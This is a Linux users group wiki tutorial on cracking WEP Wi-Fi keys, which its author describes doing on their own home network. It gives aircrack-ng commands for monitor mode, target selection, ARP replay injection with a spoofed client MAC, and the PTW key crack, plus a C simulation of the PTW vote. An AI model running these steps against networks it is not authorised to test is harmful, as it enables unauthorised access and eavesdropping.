From UVA Linux Users Group
TODO: the whole thing in detail
WEP is not secure. This has been known since Fluhrer, Mantin, and Shamir published their paper Weaknesses in the Key Scheduling Algorithm of RC4, File:Fms.pdf. Their attack is implemented in the aircrack-ng suite of tools. More recently, Erik Tews, Ralf-Philipp Weinmann, and Andrei Pyshkin have created a faster attack, which is described here and in detail in File:PTW.pdf. They claim,
We were able to extend Klein's attack and optimize it for usage against WEP. Using our version, it is possible to recover a 104 bit WEP key with probability 50% using just 40,000 captured packets. For 60,000 available data packets, the success probability is about 80% and for 85,000 data packets about 95%. Using active techniques like deauth and ARP re-injection, 40,000 packets can be captured in less than one minute under good conditions. The actual computation takes about 3 seconds and 3 MB main memory on a Pentium-M 1.7 GHz and can additionally be optimized for devices with slower CPUs. The same attack can be used for 40 bit keys too with an even higher success probability.
The PTW attack is powerful enough to make WEP a five-minute hurdle. I wrote this page to document my experience of cracking my home network with a Toshiba Satellite laptop containing an Intel PRO/Wireless 2200BG card (ipw2200 driver).
aircrack-ng - http://www.aircrack-ng.org/doku.php
- 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured.
You will want the newest version (0.9 or later) because it supports the PTW attack, which needs far fewer captured packets than the older FMS-style attack. http://www.aircrack-ng.org/doku.php?id=Main#stable
If you don't need the PTW method, version 0.6.2 can be installed with apt-get:
apt-get install aircrack-ng
You must have a wireless card which supports packet injection and monitor mode; check this page to see if your card will work: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers.
If you don't understand anything on that page, read this one: http://www.aircrack-ng.org/doku.php?id=compatible_cards
For packet injection with the ipw2200 you need to install a newer driver (loaded with the rtap_iface=1 option, so that the rtap0 capture interface used below exists) and the ieee80211 subsystem it depends on. I followed this tutorial: [http://www.aircrack-ng.org/doku.php?id=ipw2200]
Variables in this Howto
- eth1 - wireless card
- ESSID - network name
- BSSID - MAC address of the AP
- STATION - MAC address of a client associated with the AP
- CLIENT - the STATION whose MAC address we use as the source of our injected frames
- CH - channel of the network
- CAPTUREFILE - file name prefix that airodump-ng writes captured packets to
Place card in Monitor mode
In order to crack WEP you need a wireless card which can be put into monitor mode. This is done with the airmon-ng script provided by the aircrack-ng suite:
airmon-ng start eth1
airmon-ng is a wrapper that, for drivers of this era, issues the same mode change you can make yourself with iwconfig:
sudo iwconfig eth1 mode monitor
If you receive an error such as "this device does not support monitor mode", you need a better driver for your card (see the ipw2200 note above).
There are various utilities for discovering and monitoring traffic on WLANs; Kismet and airodump-ng are popular. I will document airodump-ng because it is provided with the aircrack-ng suite. First list only the networks using WEP, since those are the only ones this attack applies to:
airodump-ng --encrypt wep rtap0
(rtap0 is the ipw2200 capture interface; with another driver use the monitor-mode interface airmon-ng gave you.)
You should see a lot of information; here are the important columns:
- BSSID - the MAC address of the AP.
- ESSID - the network name.
- STATION - an associated client's MAC address.
- CH - channel of the network.
- #Data - number of data packets captured from that AP, which is roughly the number of IVs collected so far.
To pick a good target you want a client (STATION) which is generating data and is associated with a BSSID. The lower table should show a row with both the BSSID and the STATION address and at least a few (say, more than 10) packets. Note: if your card supports fake authentication (aireplay-ng --fakeauth) you don't need an existing client; the ipw2200 does not support this. Now that we have picked the network ESSID and have a target AP BSSID we can start the injection.
While loop hack for ipw2200
This hack is needed to allow the ipw2200 driver to inject packets correctly. It repeatedly puts the card into managed mode associated with the target ESSID using a bogus WEP key, then drops the key again. If you don't have an ipw2200 you can skip this part.
while true; do
    iwconfig eth1 mode managed essid "$ESSID" key ffff-ffff
    sleep 1
    iwconfig eth1 key off
    sleep 20
done
Open a new terminal and capture only the target AP's traffic to a file:
airodump-ng --bssid $BSSID -w $CAPTUREFILE rtap0
(With a driver other than ipw2200, add --channel $CH so airodump-ng stays on the target's channel instead of hopping, and use your monitor interface instead of rtap0.) When you see traffic from a client of the AP you want to attack, record its MAC address as CLIENT. We will inject with that address as our source, so the AP accepts our replayed frames as coming from an associated station.
To collect enough useful data to crack the WEP key in a short time, we need to make the AP produce a lot of initialization vectors (IVs). Every WEP frame is RC4-encrypted under the per-packet key IV||WEP key, with the 24-bit IV sent in the clear and chosen afresh for each frame, so the more frames we provoke, the more IVs and keystream samples aircrack-ng has to work with. aireplay-ng does this by capturing an encrypted ARP request (recognizable by its fixed length and broadcast destination even though it is encrypted) and retransmitting it over and over; the AP rebroadcasts each copy under a new IV. Open a new terminal and start injecting:
aireplay-ng --arpreplay -b $BSSID -h $CLIENT -i rtap0 eth1
note: the -i rtap0 option (capture on the radiotap interface while injecting on eth1) is specific to the ipw2200 driver. With a different driver, leave it out and name your single monitor interface instead of eth1.
Once injection is working and the #Data counter in airodump-ng is climbing, open a new terminal and start the crack on the capture file airodump-ng is writing. aircrack-ng re-reads the file and retries as more IVs arrive; the numeric suffix airodump-ng appends to $CAPTUREFILE varies between versions, so check the actual name with ls.
aircrack-ng -z -b $BSSID $CAPTUREFILE-0.cap
-z selects the PTW attack and -b restricts the crack to IVs from our target BSSID.
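To show what aircrack-ng -z is actually doing with all those IVs, here is an added illustration of the PTW vote. It is not aircrack-ng code and not from the page's author: the root key, the 16-byte ARP plaintext (LLC/SNAP header plus the fixed ARP fields, which is why replayed ARP frames are such good material) and the xorshift IV source are constructed for the demo, and the frames are simulated rather than read from a capture. Each frame contributes one vote per partial key sum; the most-voted sum per position is taken as correct. Because this plain top-vote has none of aircrack-ng's key ranking or ICV checking, it needs many more frames than the paper's 40,000 (800,000 are used here) to be reliable.

```c
/* PTW vote demo (added example, not aircrack-ng code).  Root key, ARP
 * plaintext and IV source are constructed; no real frames are involved. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RKLEN 13            /* 104-bit root key; use 5 for a 40-bit key */
#define KNOWN 16            /* keystream bytes an ARP frame gives away  */

static const uint8_t ROOT_KEY[RKLEN] = {      /* made-up key for the demo */
    0x1f,0x2e,0x3d,0x4c,0x5b,0x6a,0x79,0x88,0x97,0xa6,0xb5,0xc4,0xd3 };
static const uint8_t ARP_PLAIN[KNOWN] = {     /* start of every ARP request */
    0xaa,0xaa,0x03,0x00,0x00,0x00,0x08,0x06,  /* LLC/SNAP, ethertype ARP */
    0x00,0x01,0x08,0x00,0x06,0x04,0x00,0x01 };/* hw/proto type, lengths, opcode */

/* Plain RC4: key schedule (KSA), then the first n keystream bytes (PRGA). */
static void rc4_keystream(const uint8_t *key, int klen, uint8_t *ks, int n)
{
    uint8_t S[256], t, i, j = 0;
    for (int k = 0; k < 256; k++) S[k] = (uint8_t)k;
    for (int k = 0; k < 256; k++) {
        j = (uint8_t)(j + S[k] + key[k % klen]);
        t = S[k]; S[k] = S[j]; S[j] = t;
    }
    i = j = 0;
    for (int k = 0; k < n; k++) {
        i++; j = (uint8_t)(j + S[i]);
        t = S[i]; S[i] = S[j]; S[j] = t;
        ks[k] = S[(uint8_t)(S[i] + S[j])];
    }
}

/* Known-answer check: key "Key" must give keystream EB 9F 77 81 B7 34 ... */
int rc4_known_answer(void)
{
    static const uint8_t want[6] = {0xeb,0x9f,0x77,0x81,0xb7,0x34};
    uint8_t ks[6];
    rc4_keystream((const uint8_t *)"Key", 3, ks, 6);
    return memcmp(ks, want, 6) == 0;
}

/* Deterministic 24-bit IV source standing in for the AP's IV choice. */
static uint32_t iv_state = 0x9e3779b9u;
static uint32_t next_iv(void)
{
    uint32_t x = iv_state;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return (iv_state = x) & 0xffffffu;
}

/* PTW vote for one frame.  The IV is the first three RC4 key bytes, so the
 * attacker can run the first three KSA steps and knows S_3 and j_3.  Klein's
 * correlation ties keystream byte X[i-1] to the sum of key bytes 3..i, so
 * each frame votes once for every partial sum
 *   sigma_i = S_3^-1[i - X[i-1]] - (j_3 + S_3[3] + ... + S_3[i]). */
static void ptw_vote(const uint8_t *iv, const uint8_t *ks, uint32_t votes[RKLEN][256])
{
    uint8_t S[256], Sinv[256], t, j = 0, sum = 0;
    for (int k = 0; k < 256; k++) S[k] = (uint8_t)k;
    for (int k = 0; k < 3; k++) {
        j = (uint8_t)(j + S[k] + iv[k]);
        t = S[k]; S[k] = S[j]; S[j] = t;
    }
    for (int k = 0; k < 256; k++) Sinv[S[k]] = (uint8_t)k;
    for (int i = 3; i < 3 + RKLEN; i++) {
        sum = (uint8_t)(sum + S[i]);
        votes[i - 3][(uint8_t)(Sinv[(uint8_t)(i - ks[i - 1])] - (j + sum))]++;
    }
}

/* Simulate npackets replayed ARP frames, collect votes, and turn the winning
 * partial sums back into key bytes.  Returns 1 if ROOT_KEY was recovered;
 * out (RKLEN bytes, may be NULL) receives the guess. */
int ptw_demo(unsigned npackets, uint8_t *out)
{
    static uint32_t votes[RKLEN][256];
    uint8_t guess[RKLEN], pkey[3 + RKLEN], ks[KNOWN], frame[KNOWN], seen[KNOWN];
    memset(votes, 0, sizeof votes);
    memcpy(pkey + 3, ROOT_KEY, RKLEN);
    for (unsigned n = 0; n < npackets; n++) {
        uint32_t iv = next_iv();                 /* AP side: fresh IV || key */
        pkey[0] = (uint8_t)(iv >> 16); pkey[1] = (uint8_t)(iv >> 8); pkey[2] = (uint8_t)iv;
        rc4_keystream(pkey, (int)sizeof pkey, ks, KNOWN);
        for (int k = 0; k < KNOWN; k++) frame[k] = ARP_PLAIN[k] ^ ks[k];
        /* attacker side: IV is in the clear and the plaintext is known, so
         * XORing the ciphertext with ARP_PLAIN gives back the keystream */
        for (int k = 0; k < KNOWN; k++) seen[k] = frame[k] ^ ARP_PLAIN[k];
        ptw_vote(pkey, seen, votes);
    }
    uint8_t prev = 0;
    for (int i = 0; i < RKLEN; i++) {
        int best = 0;
        for (int v = 1; v < 256; v++) if (votes[i][v] > votes[i][best]) best = v;
        guess[i] = (uint8_t)(best - prev);       /* sigma_i - sigma_(i-1) */
        prev = (uint8_t)best;
    }
    if (out) memcpy(out, guess, RKLEN);
    return memcmp(guess, ROOT_KEY, RKLEN) == 0;
}

int main(void)
{
    uint8_t key[RKLEN];
    int ok = ptw_demo(800000, key);
    printf("rc4 known answer: %s\nrecovered key:", rc4_known_answer() ? "ok" : "FAIL");
    for (int i = 0; i < RKLEN; i++) printf(" %02x", key[i]);
    printf("  (%s)\n", ok ? "correct" : "wrong, needs more IVs");
    return ok ? 0 : 1;
}
```

Lower npackets to a few thousand and the winning sums start coming out wrong, which is the same effect you see when aircrack-ng reports "Failed. Next try with N IVs": the bias per vote is only about 1.36/256 against 1/256 for a wrong value, so the vote counts need many frames before the right sum stands out. aircrack-ng closes that gap by trying the top few candidates per position and checking each candidate key against a frame's CRC-32 ICV, which is why the paper can quote 40,000 frames.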
Kismet - http://www.kismetwireless.net/
- 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system.
apt-get install kismet